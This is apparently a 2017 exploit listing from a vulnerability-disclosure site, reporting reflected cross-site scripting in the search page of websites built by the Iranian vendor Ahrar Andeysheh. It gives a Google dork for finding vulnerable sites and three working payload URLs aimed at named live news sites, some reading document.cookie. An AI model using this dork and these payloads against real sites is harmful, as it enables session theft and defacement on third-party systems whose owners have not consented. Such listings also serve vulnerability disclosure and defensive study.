Ahrar Andeysheh Cross Site Scripting

2017.02.05
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Ahrar Andeysheh Cross Site Scripting |[+] |[+] Google Dork: intext:"طراحی و تولید: مؤسسه احرار اندیشه" inurl:search.php |[+] |[+] Discovered By: Voldemort799 |[+] |[+] Vendor Homepage : http://www.ahrareandeysheh.ir/ |--------------------------------------------------------------| |[+] {DEMO} |[+] |[+] http://sabernews.com/search.php?varsearch=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E |[+] |[+] http://atabe.ir/search.php?varsearch=%3Cscript%3Ealert(%22voldemort799%22)%3C%2Fscript%3E |[+] |[+] http://enghelab-news.ir/search.php?varsearch=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+]Thanks to : Hack4lx - shayan 72 |[+] voldemort799@gmail.com |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top